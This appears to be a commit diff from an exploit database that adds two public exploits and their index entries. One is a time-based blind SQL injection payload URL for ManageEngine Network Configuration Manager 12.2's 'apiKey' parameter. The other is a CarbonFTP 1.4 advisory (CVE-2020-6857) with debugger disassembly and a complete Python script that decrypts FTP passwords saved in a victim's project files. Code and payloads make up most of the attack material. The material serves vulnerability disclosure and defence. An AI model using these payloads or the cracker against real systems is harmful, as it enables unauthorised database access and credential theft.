DB: 2020-01-22

2 changes to exploits/shellcodes NEOWISE CARBONFTP 1.4 - Weak Password Encryption ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection
2020-01-22 05:02:00 +00:00 · 2020-01-22 05:02:00 +00:00 · 8128628aa6
commit 8128628aa6
parent b8cbcf2571
3 changed files with 441 additions and 0 deletions
--- a/exploits/java/webapps/47949.txt
+++ b/exploits/java/webapps/47949.txt
@ -0,0 +1,27 @@
 # Exploit Title: ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection
 # discovery Date: 2019-01-24
 # published : 2020-01-20
 # Exploit Author: AmirHadi Yazdani
 # Vendor Homepage: https://www.manageengine.com/network-configuration-manager/
 # Software Link: https://www.manageengine.com/network-configuration-manager/
 # Demo: http://demo.networkconfigurationmanager.com
 # Version: <= Build Version  : 12.2
 # Tested on: win 2012 R2
 ------------
 About ManageEngine Network Configuration Manager(NCM) (From Vendor Site) :     
 Network Configuration Manager is a multi vendor network change,
 configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices.
 NCM helps automate and take total control of the entire life cycle of device configuration management.
 --------------------------------------------------------
 Exploit POC :
 # Parameter: apiKey (GET)
 # Title: PostgreSQL Time Based Blind
 # Vector: AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
 #Payload:  
 http://127.0.0.1/api/json/dashboard/getOverviewList?apiKey=1 AND 1398=(SELECT COUNT(*) FROM GENERATE_SERIES(1,3000000))&TimeFrame=hourly&_=1483732552930
 --------------------------
--- a/exploits/windows/local/47950.txt
+++ b/exploits/windows/local/47950.txt
@ -0,0 +1,412 @@
 # Exploit Title: NEOWISE CARBONFTP 1.4 - Weak Password Encryption
 # discovery Date: 2019-01-24
 # published : 2020-01-20
 # Exploit Author: hyp3rlinx
 # Vendor Homepage: https://www.neowise.com
 # Software Link: https://www.neowise.com/freeware/
 # Version: 1.4
 [+] Credits: John Page (aka hyp3rlinx)		
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt
 [+] twitter.com/hyp3rlinx
 [+] ISR: ApparitionSec
 [Vendor]
 www.neowise.com
 [Product]
 CarbonFTP v1.4
 CarbonFTP is a file synchronization tool that enables you to synch local files with a remote FTP server and vice versa.
 It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and option
 to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be
 quickly re-used later.
 Download: https://www.neowise.com/freeware/
 Hash: 7afb242f13a9c119a17fe66c6f00a1c8
 [Vulnerability Type]
 Insecure Proprietary Password Encryption
 [CVE Reference]
 CVE-2020-6857
 [Affected Component]
 Password Encryption
 [Impact Escalation of Privileges]
 true
 [Impact Information Disclosure]
 true
 [Security Issue]
 CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key.
 The key for locally stored FTP server passwords is hard-coded in the binary. Passwords encoded as hex
 are coverted to decimal which is then computed by adding the key "97F" to the result. The key 97F seems
 to be the same for all executables across all systems. Finally, passwords are stored as decimal values.
 If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files.
 They can be found under "C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects".
 e.g.
 Password=STRING|"2086721956209392195620939"
 Observing some very short password examples we see interesting patterns:
 27264 27360 27360 27360 27360    =   a
 27520 27617 27617 27617 27617    =   b
 27266 27616 27360 27361 27616    =   aab
 27521 27616 27616 27616 27616    =   ba
 Password encryption/decryption is as follows.
 Encryption process example.
 484C as decimal is the value 18508
 97F hex to decimal is the value 2431 (encrypt key)
 18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL".
 To decrypt we just perform the reverse of the operation above.
 20939 - 2431 = 18508
 Next, convert the decimal value 18508 to hex and we get 484C.
 Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL".
 CarbonFTP passwords less than nine characters are padded using chars from the current password up until
 reaching a password length of nine bytes.
 The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length
 of nine bytes "XYXYXYXYX".
 Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes. 
 Therefore, we will get several cracked password candidates like: "HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH"
 However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one
 shot without having several candidates to choose from with one of them being the correct password.
 Therefore, "LOOOOONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947"
 and because it is greater than nine bytes it is cracked without any candidate passwords returned.
 From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process.
 Using the same password "HELL" as example.
 BPX @47DA6F
 0047DA6F | 8D 45 F0                 | lea eax,dword ptr ss:[ebp-10]                   |
 0047DA72 | 50                       | push eax                                        |
 0047DA73 | B9 05 00 00 00           | mov ecx,5                                       |
 0047DA78 | 8B D3                    | mov edx,ebx                                     |
 0047DA7A | 8B 45 FC                 | mov eax,dword ptr ss:[ebp-4]                    | [ebp-4]:"2086721956209392195620939"
 0047DA7D | E8 F6 6B F8 FF           | call carbonftp.404678                           |
 0047DA82 | 83 C3 05                 | add ebx,5                                       |
 0047DA85 | 8B 45 F0                 | mov eax,dword ptr ss:[ebp-10]                   | [ebp-10]:"20867"
 0047DA88 | E8 AF AD F8 FF           | call carbonftp.40883C                           |
 0047DA8D | 2B 45 F8                 | sub eax,dword ptr ss:[ebp-8]                    | ;<======= BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431
 0047DA90 | 66 89 06                 | mov word ptr ds:[esi],ax                        |
 0047DA93 | 83 C6 02                 | add esi,2                                       |
 0047DA96 | 8B 45 FC                 | mov eax,dword ptr ss:[ebp-4]                    | [ebp-4]:"2086721956209392195620939"
 0047DA99 | E8 7A 69 F8 FF           | call carbonftp.404418                           |
 0047DA9E | 3B D8                    | cmp ebx,eax                                     |
 0047DAA0 | 7E CD                    | jle carbonftp.47DA6F                            |
 Ok, simple explanation after SetBPX in 47DA88...
 At offset 0047DA8D,  97F is subtracted at [ebp-8] local variable which equals the decimal value 2431 (hex 97F)
 we also see EAX holds the value 55C4
 sub eax,dword ptr ss:[ebp-8]              
 therefore, 55C4 – 97F = 4C45            <======= ENCRYPT/DECRYPT KEY PROCESS.
 mov word ptr ds:[esi],ax
 add esi, 2  which is 4C45 + 2 = 4C47    <===== THEN
 Given a two letter combination like "HL":
 484C as decimal is 18508
 97F hex to decimal is 2431
 18508 + 2431 = 20939 = "HL"
 Done!
 [Exploit/POC]
 "CarbonFTPExploit.py"
 import time, string, sys, argparse, os
 from pkgutil import iter_modules
 #Sample test password 
 #LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947 
 key="97F"  #2431 in decimal, the weak hardcoded encryption key within the vuln program.
 chunk_sz=5 #number of bytes we must decrypt the password by.
 #Password is stored here:
 #C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP
 #Neowise CarbonFTP v1.4
 #Insecure Proprietary Password Encryption
 #By John Page (aka hyp3rlinx)
 #Apparition Security
 #===================================================
 def haslib(lib):
    if not lib in (name for loader, name, ispkg in iter_modules()):
        print("[!] "+lib+ " does not exist, pip install "+lib)
        exit()
    return True
 def carbonftp_conf(conf_file):
    p=""
    pipe=-1
    passwd=""
    lst_of_passwds=[]
    try:
        for p in conf_file: 
            idx = p.find("Password=STRING|")
            if idx != -1:
                pipe = p.find("|")
                if pipe != -1:
                    passwd = p[pipe + 2: -2]
                    print(" Password found: "+ passwd)
                    lst_of_passwds.append(passwd) 
    except Exception as e:
        print(str(e))
    return lst_of_passwds 
 def reorder(lst):
    k=1
    j=0
    for n in range(len(lst)):
        k+=1
        j+=1
        try:
            tmp = lst[n+k]
            a = lst[n+j]
            lst[n+j] = tmp
            lst[n+k] = a
        except Exception as e:
            pass
    return ''.join(lst)
 def dec2hex(dec):
    tmp = str(hex(int(dec)))
    return str(tmp[2:])
 def hex2ascii(h):
    h=h.strip()
    try:
        hex_val = h.decode("hex")
    except Exception as e:
        print("[!] Not a valid hex string.")
        exit()
    filtered_str = filter(lambda s: s in string.printable, hex_val)
    return filtered_str
 def chunk_passwd(passwd_lst):
    lst = []
    for passwd in passwd_lst:
        while passwd:
            lst.append(passwd[:chunk_sz])
            passwd = passwd[chunk_sz:]
    return lst
 cnt = 0
 passwd_str=""
 def deob(c):
    global cnt, passwd_str
    tmp=""
    try:
        tmp = int(c) - int(key, 16)
        tmp = dec2hex(tmp)
    except Exception as e:
        print("[!] Not a valid CarbonFTP encrypted password.")
        exit()
    b=""
    a=""
     #Seems we can delete the second char as its most always junk.
    if cnt!=1:
        a = tmp[:2]
        cnt+=1
    else:
        b = tmp[:4]
    passwd_str += hex2ascii(a + b)
    hex_passwd_lst = list(passwd_str)
    return hex_passwd_lst
 def no_unique_chars(lst):
    c=0
    k=1
    j=0
    for i in range(len(lst)):
        k+=1
        j+=1
        try:
            a = lst[i]
            b = lst[i+1]
            if a != b:
                c+=1
            elif c==0:
                print("[!] Possible one char password?: " +str(lst[0]))
                return lst[0]
        except Exception as e:
            pass
    return False
 def decryptor(result_lst):
    global passwd_str, sz
    final_carbon_passwd=""
    print(" Decrypting ... \n")
    for i in result_lst:
        print("[-] "+i)
        time.sleep(0.1)
        lst = deob(i)
    #Re-order chars to correct sequence using custom swap function (reorder).
    reordered_pass = reorder(lst)
    sz = len(reordered_pass)
    #Flag possible single char password.
    no_unique_chars(lst)
    print("[+] PASSWORD LENGTH: " + str(sz))
    if sz == 9:
        return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-4] + " | " +
                reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)
    #Shorter passwords less then nine chars will have several candidates
    #as they get padded with repeating chars so we return those.
    passwd_str=""
    return reordered_pass
 def display_cracked_passwd(sz, passwd):
    if sz==9:
        print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
    else:
        print("[*] DECRYPTED PASSWORD: "+passwd + "\n")
 def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
    parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
    return parser.parse_args()
 def main(args):
    global passwd_str, sz
    victim=""
    haslib("clint")
    if args.user and args.encrypted_password:
        print("[!] Supply a victims username -u or single encrypted password -p, not both.")
        exit()
    print("[+] Neowise CarbonFTP v1.4")
    time.sleep(0.1)
    print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
    time.sleep(0.1)
    print("[+] Discovered and cracked by hyp3rlinx")
    time.sleep(0.1)
    print("[+] ApparitionSec\n")
    time.sleep(1)
    #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
    if args.user:
        victim = args.user
        os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
        dir_lst = os.listdir(".")
        for c in dir_lst:
            f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
            #Get encrypted password from conf file
            passwd_enc = carbonftp_conf(f)
            #Break up into 5 byte chunks as processed by the proprietary decryption routine.
            result_lst = chunk_passwd(passwd_enc)
            #Decrypt the 5 byte chunks and reassemble to the cleartext password.
            cracked_passwd = decryptor(result_lst)
            #Print cracked password or candidates.
            display_cracked_passwd(sz, cracked_passwd)
            time.sleep(0.3)
            passwd_str=""
            f.close()
    #Crack a single password -p flag.
    if args.encrypted_password:
        passwd_to_crack_lst = []
        passwd_to_crack_lst.append(args.encrypted_password)
        result = chunk_passwd(passwd_to_crack_lst)
        #Print cracked password or candidates.
        cracked_passwd = decryptor(result)
        display_cracked_passwd(sz, cracked_passwd)
 if __name__=="__main__":
    parser = argparse.ArgumentParser()
    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        exit()
    main(parse_args())
 [POC Video URL]
 https://www.youtube.com/watch?v=q9LMvAl6LfE
 [Network Access]
 Local
 [Severity]
 High
 [Disclosure Timeline]
 Vendor Notification: Website contact form not working, several attempts : January 12, 2020
 CVE Assigned by mitre : January 13, 2020
 January 20, 2020 : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
 hyp3rlinx
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10913,6 +10913,7 @@ id,file,description,date,author,type,platform,port
 47943,exploits/windows/local/47943.txt,"Trend Micro Maximum Security 2019 - Privilege Escalation",2020-01-17,hyp3rlinx,local,windows,
 47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows,
 47945,exploits/xml/local/47945.txt,"Easy XML Editor 1.7.8 - XML External Entity Injection",2020-01-20,"Javier Olmedo",local,xml,
 47950,exploits/windows/local/47950.txt,"NEOWISE CARBONFTP 1.4 - Weak Password Encryption",2020-01-21,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42249,3 +42250,4 @@ id,file,description,date,author,type,platform,port
 47941,exploits/php/webapps/47941.py,"Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass",2020-01-17,"B. Canavate",webapps,php,
 47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php,
 47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php,
 47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java,